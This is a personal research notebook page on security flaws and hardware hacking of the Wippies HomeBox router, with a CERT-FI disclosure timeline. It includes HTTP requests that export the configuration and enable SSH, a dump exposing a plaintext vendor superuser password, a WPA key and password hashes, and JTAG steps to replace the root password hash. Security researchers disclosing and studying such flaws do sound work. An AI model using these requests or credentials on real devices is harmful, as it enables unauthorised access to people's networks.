quickanddirty - WippiesHomeBox.wiki

This wiki page is meant for me (Juhapekka Piiroinen) as online notepad for the research project.

PENDING FOR PERMISSIONS from CERT-FI and Elisa

As there are some exploits for this device, but which are not fixed by the manufacturer. I have contacted CERT-FI and they have contacted Elisa. This process started 3/2010 and is still going on. I will release a full report of the findings on December.

First email was sent 26.1.2010

Where i reported issues to CERT-FI. They reported to Elisa

First contact from Elisa 26.11.2010

Where it seems that they do not see any exploit here. Waiting for the last written answer.

Second contact from Elisa 1.12.2010

The exploit has been fixed in their latest firmware (A50803-Sauna35-24524). So it should be fine to release the stuff. However they noted that some one had noticed same thing in 8/2009. This raised a question that why they did not fix it asap, if they knew it :D

...and they did not reply to the question why they store the password in plaintext in the device, it would be more clever to store the password as hash.. oh well.. I will go next thru the material and release all of it. Should take few weekends..

The data export

This info has been reported to CERT-FI in 12/2010 with ticket #347299

Exporting data GET /cgi-bin/export.cgi?sExportMode=text HTTP/1.1 Host: 192.168.0.1 Referer: http://192.168.0.1/setup.htm

Writing settings ``` POST /cgi-bin/generic.cgi HTTP/1.1 Host: 192.168.0.1 Referer: http://192.168.0.1/setup.htm Content-Type: application/x-www-form-urlencoded Content-Length: 40

token=GxsWWC&write=Services_SSH_Enable:1 ```

Begin of a partial dump WebCam_1_UploadImage_Server='wsftp.wippies.com' WebCam_1_UploadImage_Port=2222 WLANInterface_2_Config_SSID='WippiesVOIP' WLANInterface_2_Config_WPADefaultKey='wippiesvoip' WLANInterface_2_Config_WPAEncryption='TKIP' WebConfigurator_SuLogin='bewan' WebConfigurator_SuPassword='8Ve63Cl9hS4g.' Services_TR069_ACSUrl='https://acs.wiax.net:8043/acs' Services_UnixAdmin_Username='admin' Services_UnixAdmin_Password='$1$$yDJWJcZIubC6Kuklfp5n0.' Services_UnixAdmin_UserID=600 Services_UnixAdmin_GroupID=600 Services_UnixAdmin_Shell='/bin/cli' Services_Telnet_Enable=0 Services_Ssh_Enable=0

OpenWrt runs on this device

See page 2+ @ https://forum.openwrt.org/viewtopic.php?id=15934

Details

JTAG

Propably the JTAG connector is the one under the UART on the PCB. Correct me if i am wrong. http://www.t-hack.com/wiki/index.php/EJTAG

Hardware

http://www.arcadyan.com/english/products/product_detail.asp?PROD_L1ID=00000003&PROD_ID=00000024

Memory

0x00000000-0x01000000 : "Flash" 0x00000000-0x00020000 : "Loader" 0x00020000-0x00040000 : "Config" 0x00040000-0x00820000 : "Firmware" 0x00820000-0x01000000 : "OldFirmware"

Misc

The backfire/ifxmips version of the openwrt should have a support for ARV4519 based Arcadian boards. * http://backfire.openwrt.org/10.03-beta/ifxmips/ * http://www.linux-mips.org/wiki/Danube * http://www.mail-archive.com/openwrt-devel@lists.openwrt.org/msg01503.html * https://forum.openwrt.org/viewtopic.php?id=15934 * http://backfire.openwrt.org/10.03-rc3/README

Bootloader

BRN Bootloader is installed, but u-boot is required for better usage.. and there is no asking for space or anything so that we could access the BRN Bootloader menu.. * http://backfire.openwrt.org/10.03-beta/ifxmips/uboot-ifxmips/

Pins

J16

ROM VER: 1.0.3 CFG 05 Read EEPROMX X SFLASH X SFLAS5)Â5ReÅ*jªÕH¨HHÕª U*'HL.3 CFG 05 Read EEPROMX X

J21

no header information (ROM VER.. etc). just booting normally.

``` Booting from partition 0 in flash.

Loading: Linux Kernel Image

Load address = 80000000 Uncompressing Linux.....................

kernel corrupted!

-- System halted] ```

J16+J21

ROM VER: 1.0.3 CFG 04 Read EEPROMX X UART

Other

There should be a hidden bootloader inside the main cpu as well. according to the discussion in openwrt devel mailinglist there should be few resistors on the board which needs to be changed to enable UART bootloader, or something.

UART - The pins on the board

``` Now you have to identify the bootstrap pins. Maybe John knows more about it?

Your mode is 1 (BootSel0 1, BootSel1 0, BootSel2 0) . We would need the configuration 4 for UART mode (BootSel0 0, BootSel1 0, BootSel2 1) . The UART boot log should look like ...

> ROM VER: 1.0.3 CFG 04 Read EEPROMX X UART
<<<

In case that's not possible to identify the correct bootstrap pins you would have to live with the original bootloader :-(

``` * http://www.mail-archive.com/openwrt-devel@lists.openwrt.org/msg03920.html

Enabling MIPS JTAG

There is also an existing place holder for the JTAG. - not tried yet.. we should be able to access the flash using that one and also modify the filesystem, etc.

Info

``` First read the original configuration information from flash:

cable parallel 0x378 WIGGLER detect include admtek/adm5120/adm5120 detectflash 0xd000000 readmem 0x0d020000 0x20000 config.bin

Mount config.bin (it's in ext2 format) and find following line from router.conf (hash changed in this example):

UserTable_1_Unix_Password='$1$$ASDFasdfASDfasdf'

and replace it with a password hash of your own choice.

check the size of router.conf and change router.magic accordingly.

unmount and program flash:

cable parallel 0x378 WIGGLER detect include admtek/adm5120/adm5120 detectflash 0xd000000 flashmem 0x0d020000 config.bin

reboot the router, ssh root@192.168.0.1, enjoy. ``` * http://koti.kapsi.fi/jvaarani/homebox/jtag_flash_procedure.txt

Enabling Multicast mode on boot loader

Press Wifi button when switching power On. * No idea what this mode does, Stays in multicast mode for few seconds. * udpcast? * tftp? * wtf? ``` Capabilities : 80000001

Entering multicast mode Leaving multicast mode

Found valid bootable partition 0: ```

Enabling Serial port

There is an existing connector inside the box. Socket J3: VCC 1 2 ? RX 3 4 ? TX 5 6 ? ? 7 8 ? GND 9 10 ? I used UB232R for USB-UART connection. with following settings: Speed: 115200 Data bits: 8 Stop bits: 1 Parity: None Flow control: None

UART output on boot

``` ROM VER: 1.0.3 CFG 01 Read ˜ ROM VER: 1.0.3 CFG 01 Read EEPROMX X

_
| |__ _ _ _ __
| '_ \ / _ \ \ /\ / / ` | ' \ | |) | _/\ V V / (| | | | | |./ ___| _/_/ __,|| |_|

Parameters: Product : A50803 Product family : A50800 Flash size : 1000000 DRAM size : 2000000 Ethernet : MII LAN MAC address : - deleted on paste - WAN MAC address : - deleted on paste - Dual bank boot : yes Reset : no Pairing : no Serial number : - deleted on paste - WEP key : - deleted on paste - Loader version : - deleted on paste - Capabilities : - deleted on paste -

Booting from partition 0 in flash.

Loading: Linux Kernel Image

Load address = 80000000 Uncompressing Linux..................... done, booting the kernel.

start addr = 802F1000 memsize=31 TODO: chip version Linux version 2.6.16bewan (build@bewan.com) (gcc version 3.3.4) #1 Reserving memory for CP1 @0xa1f00000 memsize=31 CPU revision is: 00019641 PCI: Probing PCI hardware on host bus 0. Board with an external oscillator Determined physical RAM map: memory: 01f00000 @ 00000000 (usable) User-defined physical RAM map: memory: 01f00000 @ 00000000 (usable) Built 1 zonelists Kernel command line: nofpu console=ttyS0,115200n1 bewan_boot=flash0 bewan_fs_addr=0x11c000 bewan_fs_size=0x6e7000 mem=31M Primary instruction cache 16kB, physically tagged, 4-way, linesize 32 bytes. Primary data cache 16kB, 4-way, linesize 32 bytes. Synthesized TLB refill handler (20 instructions). Synthesized TLB load handler fastpath (32 instructions). Synthesized TLB store handler fastpath (32 instructions). Synthesized TLB modify handler fastpath (31 instructions). Cache parity protection disabled PID hash table entries: 128 (order: 7, 2048 bytes) mips_hpt_frequency:166666667 r4k_offset: 00196e6a(1666666) Using 166.667 MHz high precision timer. Dentry cache hash table entries: 4096 (order: 2, 16384 bytes) Inode-cache hash table entries: 2048 (order: 1, 8192 bytes) Memory: 27628k/31744k available (2517k kernel code, 4116k reserved, 492k data, 160k init, 0k highmem) Mount-cache hash table entries: 512 Checking for 'wait' instruction... available. NET: Registered protocol family 16 TC classifier action (bugs to netdev@vger.kernel.org cc hadi@cyberus.ca) DANUBE MIPS24KEc MPS mailbox driver, Version 1.1.0 (c) Copyright 2006, Infineon Technologies AG IFX_MPS: using proc fs squashfs: version 3.0 (2006/03/15) Phillip Lougher Squashfs 2.2 with LZMA support devfs: 2004-01-31 Richard Gooch (rgooch@atnf.csiro.au) devfs: boot_options: 0x1 Initializing Cryptographic API io scheduler noop registered (default) Danube MEI version:1.00.09 Danube MEI MIB version:0.90.04 Danube Port Settings

Danube Port Initialization cgu: misc_register on minor = 63 gptu: totally 6 16-bit timers/counters gptu: misc_register on minor 62 gptu: succeeded to request irq 118 gptu: succeeded to request irq 119 gptu: succeeded to request irq 120 gptu: succeeded to request irq 121 gptu: succeeded to request irq 122 gptu: succeeded to request irq 123 ttyS0 at MMIO 0xbe100c00 (irq = 9) is a DANUBEASC ttyS1 at MMIO 0xbe100400 (irq = 2) is a DANUBEASC RAMDISK driver initialized: 16 RAM disks of 8192K size 1024 blocksize loop: loaded (max 8 devices) PPP generic driver version 2.4.2 NET: Registered protocol family 24 danube ETOP driver loaded! ppe: ATM init succeeded (firmware version 1.1.0.2.1.13 Danube IAD flash device: 0x1000000 at 0xb0000000 Danube IAD FLASH: Found 1 x16 devices at 0x0 in 16-bit bank Intel/Sharp Extended Query Table at 0x0031 cfi_cmdset_0001: Erase suspend on write enabled Creating 5 MTD partitions on "Danube IAD FLASH": 0x00000000-0x01000000 : "Flash" 0x00000000-0x00020000 : "Loader" 0x00020000-0x00040000 : "Config" 0x00040000-0x00820000 : "Firmware" 0x00820000-0x01000000 : "OldFirmware" bootpart=1 Creating 1 MTD partitions on "Danube IAD FLASH": 0x0011c000-0x00803000 : "ART" rootdev = 31,5 dwc_otg: version 2.40a 10-APR-2006 usb0: Ethernet Gadget, version: Equinox 2004 usb0: using dwc_otg_pcd, OUT ep2 IN ep1 STATUS ep3 usb0: MAC 0e:ac:1d:0b:9b:e1 usb0: HOST MAC a2:d8:58:a1:c5:ea usb0: RNDIS ready LED and Buttons driver: v2.6.0 GACT probability on Mirror/redirect action on netem: version 1.2 u32 classifier Perfomance counters on input device check on Actions configured Netfilter messages via NETLINK v0.30. NET: Registered protocol family 2 IP route cache hash table entries: 256 (order: -2, 1024 bytes) TCP established hash table entries: 1024 (order: 0, 4096 bytes) TCP bind hash table entries: 1024 (order: 0, 4096 bytes) TCP: Hash tables configured (established 1024 bind 1024) TCP reno registered ip_conntrack version 2.4 (248 buckets, 1984 max) - 232 bytes per conntrack meiMailboxWrite: